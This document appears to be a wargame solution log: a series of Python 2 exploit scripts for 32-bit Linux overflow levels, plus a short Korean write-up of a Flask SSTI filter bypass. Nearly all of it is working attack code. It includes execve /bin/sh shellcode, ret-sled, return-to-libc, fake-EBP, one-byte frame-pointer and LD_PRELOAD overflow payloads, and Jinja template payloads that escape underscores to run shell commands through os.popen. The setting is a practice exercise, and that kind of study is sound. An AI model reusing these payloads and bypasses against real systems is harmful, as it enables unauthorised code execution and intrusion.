exploit.py

import os
from struct import *

# Python 2 script: pack() returns str here, so the str concatenations below
# work. Under Python 3 pack() returns bytes and `shellAddress + "..."` raises
# TypeError. Only pack() is used from the wildcard `from struct import *`.
p = lambda x : pack("<L" , x)
# Target binary; the payload is handed to it as argv[1] by execl() below.
path = '/home/succubus/nightmare'
# Absolute addresses packed as 32-bit little-endian words. They are fixed
# values from the author's environment (presumably a PLT entry and a stack
# slot — confirm against the binary); a different build, environment size or
# any address randomization (ASLR) moves them and the run simply fails.
strcpyAddress = p(0x8048410)
shellAddress = p(0xbffffa74)
# shellAddress, raw machine-code bytes, then 11 NOP (0x90) bytes. Reproduced
# byte-for-byte: any altered byte changes what executes.
shellCode = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"\x90"*11
dstAddress = p(0xbffffaa0)
srcAddress = p(0xbffffa70)
# argv[1] layout: shellCode, 4 filler bytes, strcpyAddress, 4 filler bytes,
# dstAddress, srcAddress. The filler widths are target-specific.
payload = shellCode+"A"*4+strcpyAddress+"A"*4+dstAddress+srcAddress

# Replaces this process with the target. execl() passes the argument list
# directly (no shell), so the raw bytes in payload are not shell-interpreted.
os.execl(path,path,payload)



Node.js Unicode Failure

2019. 4. 22. 20:52


Flask SSTI인데 필터링이 _ 랑 . 이렇게 두개밖에 없다. 필터가 빡센편이 아니라 아래 페이로드로 우회해서 명령어 실행해주면 된다. 


payload

{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][2]['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('ls')['read']()}}


{{''['\x5f\x5fclass\x5f\x5f']['\x5f\x5fmro\x5f\x5f'][2]['\x5f\x5fsubclasses\x5f\x5f']()[59]['\x5f\x5finit\x5f\x5f']['\x5f\x5fglobals\x5f\x5f']['\x5f\x5fbuiltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['popen']('cat fort\x2epy')['read']()}}




chainning.py


import os

from struct import *


# Python 2 script (pack() returns str); the str concatenation in payload
# would raise TypeError under Python 3 where pack() returns bytes.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/zombie_assassin/succubus'

# Five addresses in the 0x0804xxxx range, presumably functions of the target
# in a non-PIE 32-bit layout (names are the author's — confirm against the
# binary). Hard-coded, so they are valid only for this exact build.
doAddress = p(0x80487ec)

gyeAddress = p(0x80487bc)

gulAddress = p(0x804878c)

yutAddress = p(0x804875c)

moAddress = p(0x8048724)

# A fixed stack address (0xbffffa48); any layout change or ASLR breaks it.
paramAddress = p(0xbffffa48)

# argv[1]: 44 filler bytes, the five addresses in order, 4 filler bytes,
# paramAddress, then the ASCII bytes "/bin" "/sh". Offsets are target-specific.
payload = "A"*44+doAddress+gyeAddress+gulAddress+yutAddress+moAddress+"AAAA"+paramAddress+"\x2f\x62\x69\x6e"+"\x2f\x73\x68"

# Replaces this process with the target; no shell is involved in passing payload.
os.execl(path,path,payload)


retSled.py


import os

from struct import *


# Python 2 script (pack() returns str); under Python 3 the str + bytes
# concatenation in payload raises TypeError.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/zombie_assassin/succubus'

# Fixed addresses from the author's environment: one in the 0x0804xxxx range
# (presumably code in the target) and one stack address. ASLR or a different
# environment layout invalidates both.
doAddress = p(0x80487ec)

shellAddress = p(0xbffffa14)

# 20 NOP (0x90) bytes followed by raw machine-code bytes; reproduced
# byte-for-byte since any changed byte alters what executes.
shellCode ="\x90"*20+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"

# argv[1]: 44 filler bytes, doAddress, shellAddress, shellCode.
payload = "A"*44+doAddress+shellAddress+shellCode


# Replaces this process with the target; execl() passes payload directly, no shell.
os.execl(path,path,payload)



exploit.py


import os

from struct import *


# Python 2 script (pack() returns str); under Python 3 the concatenations
# in payload mix bytes and str and raise TypeError.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/assassin/zombie_assassin'

# Fixed addresses from the author's run. Variable names are the author's
# labels (a "leave/ret" gadget in the target's code range, a stack address,
# and a fake saved-EBP value); none of them survive ASLR or a different
# environment size.
leaveRetGaget = p(0x80484df)

shellAddress = p(0xbffffa74)

# Raw machine-code bytes, kept byte-for-byte.
shellCode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"

fEbpAddress = p(0xbffffa6c)

# argv[1]: shellAddress, 11 NOP (0x90) bytes, shellCode, fEbpAddress,
# leaveRetGaget. Offsets are target-specific.
payload = shellAddress+"\x90"*11+shellCode+fEbpAddress+leaveRetGaget


# Replaces this process with the target; execl() passes payload directly, no shell.
os.execl(path,path,payload)


exploit.py


import os

from struct import *


# Python 2 script (pack() returns str); under Python 3 "A"*44 + bytes raises
# TypeError.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/giant/assassin'

# Fixed addresses from the author's run: one in the target's 0x0804xxxx
# code range (the author calls it a ret gadget) and one stack address.
# Hard-coded, so ASLR or a different environment layout breaks the run.
retGaget = p(0x804851e)

shellAddress = p(0xbffffbd8)

# argv[1]: 44 filler bytes, retGaget, shellAddress. Note this script places
# no machine code itself; whatever shellAddress refers to must already exist
# in the target's environment — not shown on this page.
payload = "A"*44+retGaget+shellAddress


# Replaces this process with the target; execl() passes payload directly, no shell.
os.execl(path,path,payload)



exploit.py


import os

from struct import *


# Python 2 script (pack() returns str); every str + pack() concatenation
# below would raise TypeError under Python 3.
p = lambda x : pack("<L" , x)

# The target is addressed by a file name made of the four raw bytes of
# 0xbffffc79 — the same value the mv below renames the binary to.
path = '/home/bugbear/'+p(0xbffffc79)

# Fixed address in the 0x40xxxxxx range (the author labels it system; on
# this environment that is presumably a shared-library address — confirm).
# Hard-coded, so ASLR or a different library build invalidates it.
systemAddress = p(0x400A9D48)

# Three fixed stack addresses (0xbffffc79, 0xbffffff7, 0xbffffffc).
param1 = p(0xbffffc79)

param2 = p(0xbffffff7)

param3 = p(0xbffffffc)

# argv[1]: 44 filler bytes, systemAddress, 4 filler bytes, param1..param3.
payload = "A"*44 + systemAddress + "BBBB" + param1 + param2 + param3


# Persistent side effect: renames /home/bugbear/giant to a name consisting of
# four raw address bytes. Runs through /bin/sh via os.system, the return code
# is not checked, and a second run fails here (source already renamed) while
# the execl below still finds the renamed file. Not undone by this script.
os.system("mv /home/bugbear/giant "+p(0xbffffc79))

# Replaces this process with the renamed target; execl() passes payload
# directly, no shell.
os.execl(path,path,payload)


exploit.py


import os

from struct import *


# Python 2 script (pack() returns str); under Python 3 "A"*44 + bytes raises
# TypeError.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/darkknight/bugbear'

# Fixed addresses from the author's run: one in the 0x40xxxxxx range (labelled
# system by the author, presumably a shared-library address — confirm) and
# one stack address. Hard-coded, so ASLR or a different library build breaks it.
systemAddress = p(0x40058ae0)

shellParamAddress = p(0xbffffc6d)

# argv[1]: 44 filler bytes, systemAddress, 4 filler bytes, shellParamAddress.
# This script places no command string itself; whatever shellParamAddress
# refers to must already exist in the target's environment — not shown here.
payload = "A"*44 + systemAddress + "BBBB" + shellParamAddress


# Replaces this process with the target; execl() passes payload directly, no shell.
os.execl(path,path,payload)



exploit.py


import os

from struct import *


# Python 2 script (pack() returns str); under Python 3 the bytes + str
# concatenation in payload raises TypeError.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/golem/darkknight'

# Fixed stack address from the author's run; ASLR or a different environment
# layout invalidates it.
shellAddress = p(0xbffffa98)

# Single trailing byte, named FPO_Byte by the author.
FPO_Byte = "\x90"

# argv[1]: shellAddress, raw machine-code bytes (kept byte-for-byte),
# 11 filler bytes, then FPO_Byte. Offsets are target-specific.
payload = shellAddress+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"+"A"*11+FPO_Byte


# Replaces this process with the target; execl() passes payload directly, no shell.
os.execl(path,path,payload)



exploit.py


import os

from struct import *


# Python 2 script (pack() returns str); under Python 3 "A"*44 + bytes raises
# TypeError.
p = lambda x : pack("<L" , x)

# Target binary; payload becomes its argv[1].
path = '/home/skeleton/golem'

# Fixed stack address from the author's run; ASLR or a different environment
# layout invalidates it.
shellAddress =  p(0xbffff530)

# argv[1]: 44 filler bytes then shellAddress. The machine code is not in
# argv at all — it is carried in the file name of the preloaded library below.
payload = "A"*44+shellAddress

# 155 NOP (0x90) bytes followed by raw machine-code bytes; used verbatim as a
# file name, so it is kept byte-for-byte.
shellCode = "\x90"*155+"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"


# Both commands run through /bin/sh via os.system and their return codes are
# not checked. The gcc command line embeds the raw shellCode bytes, so any
# shell metacharacter in them would be interpreted by the shell; the empty
# test.c and the built .so are left on disk (no cleanup).
os.system("touch test.c")

os.system("gcc -shared -fPIC -o " + shellCode + " test.c")

# Sets LD_PRELOAD in this process's environment; execl() hands os.environ to
# the target, so the dynamic loader picks the library above up there.
os.environ["LD_PRELOAD"] = "./"+shellCode

# Replaces this process with the target; execl() passes payload directly, no shell.
os.execl(path,path,payload)

